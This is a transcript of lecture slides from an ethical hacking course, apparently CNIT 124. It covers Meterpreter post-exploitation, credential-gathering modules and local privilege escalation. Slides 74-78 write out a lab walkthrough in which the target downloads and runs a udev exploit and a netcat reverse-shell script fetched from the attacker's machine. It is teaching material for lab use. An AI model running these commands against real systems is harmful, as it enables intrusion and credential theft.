CNIT 124 Ch 13: Post Exploitation (Part 1)
Transcript of CNIT 124 Ch 13: Post Exploitation (Part 1)
![Page 1: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/1.jpg)
CNIT 124: Advanced Ethical
Hacking
Ch 13: Post Exploitation Part 1
Rev. 11-8-17
![Page 2: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/2.jpg)
Topics in This Lecture
• Meterpreter • Meterpreter Scripts • Metasploit Post-Exploitation Modules • Railgun • Local Privilege Escalation
![Page 3: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/3.jpg)
Topics in the Next Lecture
• Local Information Gathering • Lateral Movement • Pivoting • Persistence
![Page 4: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/4.jpg)
Meterpreter
![Page 5: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/5.jpg)
Help
• help at meterpreter prompt – Shows all meterpreter commands
• command –h – Help about a specific command
• help command – Help about a specific command
![Page 6: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/6.jpg)
Controlling Metasploit Sessions
• sessions – lists sessions
• sessions -i 1 – Starts interaction with session 1
• background – preserves a session, returns to the msf> prompt
• exit – closes a Meterpreter session
![Page 7: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/7.jpg)
Upload
• Must use two backslashes to symbolize one – "Escaping" in Linux
![Page 8: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/8.jpg)
Windows Binaries in Kali 2
![Page 9: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/9.jpg)
Project 15: RAM Scraping
![Page 10: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/10.jpg)
![Page 11: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/11.jpg)
Meterpreter Scripts
![Page 12: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/12.jpg)
Meterpreter Scripts
![Page 13: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/13.jpg)
Deprecated
![Page 14: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/14.jpg)
AutoRunScript
![Page 15: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/15.jpg)
Getting Help• run script -h
• ps lists running processes on target • Useful to choose a migration target
• run migrate -p 1144
![Page 16: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/16.jpg)
Prefetch
• Prefetch shows last 128 programs used • Useful for forensics
![Page 17: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/17.jpg)
process_memdump
![Page 18: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/18.jpg)
persistence
![Page 19: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/19.jpg)
virusscan_bypass
![Page 20: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/20.jpg)
Other Interesting Scripts
• arp_scanner -- fast host discovery • killav -- no information in help
![Page 21: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/21.jpg)
![Page 22: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/22.jpg)
Metasploit Post-Exploitation Modules
![Page 23: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/23.jpg)
Directory Structure
![Page 24: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/24.jpg)
post/windows/gather
![Page 25: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/25.jpg)
bitcoin_jacker
![Page 26: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/26.jpg)
netlm_downgrade
![Page 27: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/27.jpg)
enum_logged_on_users
![Page 28: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/28.jpg)
enum_logged_on_users
![Page 29: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/29.jpg)
Gathering Credentials
![Page 30: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/30.jpg)
Autologon Password
![Page 31: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/31.jpg)
Not On By Default
![Page 32: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/32.jpg)
sso (MimiKatz)
![Page 33: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/33.jpg)
On By Default ☺
![Page 34: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/34.jpg)
Gather Modules
![Page 35: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/35.jpg)
More Gather Modules
![Page 36: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/36.jpg)
CheckVM
![Page 37: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/37.jpg)
It Works!
![Page 38: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/38.jpg)
BitLocker Recovery Passwords
![Page 39: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/39.jpg)
LSA Secrets!
![Page 40: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/40.jpg)
Works on Server 2008!
![Page 41: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/41.jpg)
memory_grep
![Page 42: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/42.jpg)
Looks Good But Fails
![Page 43: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/43.jpg)
• An alternative to using MimiKatz • Metasploit SMB Listener (Link Ch 13b)
![Page 44: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/44.jpg)
Phishing
![Page 45: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/45.jpg)
Fails on Win 7 and 2008
• Won't run at all on Win 2008
• On Win 7, this box pops up all the time but the password never appears in Metasploit
• Must restart Windows to make it stop
![Page 46: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/46.jpg)
enum_ie
![Page 47: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/47.jpg)
Fails
• Gets no passwords or cookies from Win 7 or Win 2008
• Does get some Web history links from IE 7 on Win 2008
![Page 48: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/48.jpg)
Management Modules
![Page 49: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/49.jpg)
inject_ca
• Subverts HTTPS ☺
![Page 50: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/50.jpg)
MS SQL Auth Bypass
![Page 51: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/51.jpg)
Forensic Image of Target
• Harvest deleted files
![Page 52: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/52.jpg)
Exploit PXE Pre-eXecution Boot
![Page 53: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/53.jpg)
Remote Packet Capture
![Page 54: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/54.jpg)
Look in Shadow Copies (Restore Points)
![Page 55: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/55.jpg)
Find Open Outgoing Ports
![Page 56: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/56.jpg)
Find Wireless Networks
![Page 57: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/57.jpg)
Steal WPA Keys
![Page 58: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/58.jpg)
![Page 59: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/59.jpg)
Railgun
![Page 60: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/60.jpg)
Allows Direct Access to Windows APIs
• API: Application Program Interface • irb drops into a Ruby shell • client.railgun.shell32.IsUserAnAdmin • Tells Ruby interpreter to use railgun to
access the IsUserAdmin function of shell32.dll
![Page 61: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/61.jpg)
Allows Direct Access to Windows APIs
![Page 62: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/62.jpg)
reverse_lookup uses Railgun
![Page 63: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/63.jpg)
Local Privilege Escalation
![Page 64: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/64.jpg)
getsystem
• Tries to elevate to SYSTEM on Windows • rev2self undoes this escalation
![Page 65: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/65.jpg)
User Account Control (UAC)
• Pops up when something needs administrator privileges
![Page 66: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/66.jpg)
UAC Blocks getsystem
• On Win 7
![Page 67: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/67.jpg)
Bypassing UAC
![Page 68: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/68.jpg)
Process Injection
![Page 69: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/69.jpg)
Worked on Win 7!
![Page 70: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/70.jpg)
Udev Privilege Escalation on Linux
• uname -a to find kernel version • lsb_release -a to find Ubuntu version
• udevadm --version
![Page 71: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/71.jpg)
Searching the Exploitdb Repository
• searchsploit
![Page 72: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/72.jpg)
Recent Ubuntu Exploits
![Page 73: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/73.jpg)
8572.c
![Page 74: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/74.jpg)
Exploit Process
• On Kali • ln -s /usr/share/exploitdb/platforms/
linux/local/ /var/www/html/ • On Metasploitable 2 • cd /tmp • wget http://172.16.1.188/local/
8572.c • gcc -o 8572 8572.c
![Page 75: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/75.jpg)
Exploit Process
• On Kali • nano /var/www/html/run • #!/bin/bash • nc 172.16.1.188 12345 -e /bin/
bash • nc -lvp 12345
![Page 76: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/76.jpg)
Exploit Process
• On Metasploitable 2 • cd /tmp • wget http://172.16.1.188/run
![Page 77: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/77.jpg)
Exploit Process
• On Metasploitable 2 • cat /proc/net/netlink • ps aux | grep udev • ./8572 2738
![Page 78: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/78.jpg)
Exploit Process
• gcc must be installed on target Linux system
• Put 8572.c in /var/www/html on Kali • Download it to target system with wget • Compile there and run
![Page 79: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/79.jpg)
Escalation
![Page 80: CNIT 124 Ch 13: Post Exploitation (Part 1)](https://reader034.fdocuments.us/reader034/viewer/2022051101/5a6488b07f8b9a27568b5cfd/html5/thumbnails/80.jpg)